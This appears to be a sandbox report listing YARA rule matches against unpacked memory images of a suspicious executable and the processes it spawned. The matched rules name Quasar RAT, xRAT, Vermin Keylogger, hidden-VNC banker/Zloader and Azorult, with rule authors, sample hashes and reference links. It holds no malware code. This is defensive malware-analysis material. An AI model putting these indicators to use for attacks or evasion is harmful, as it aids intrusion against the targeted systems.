Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
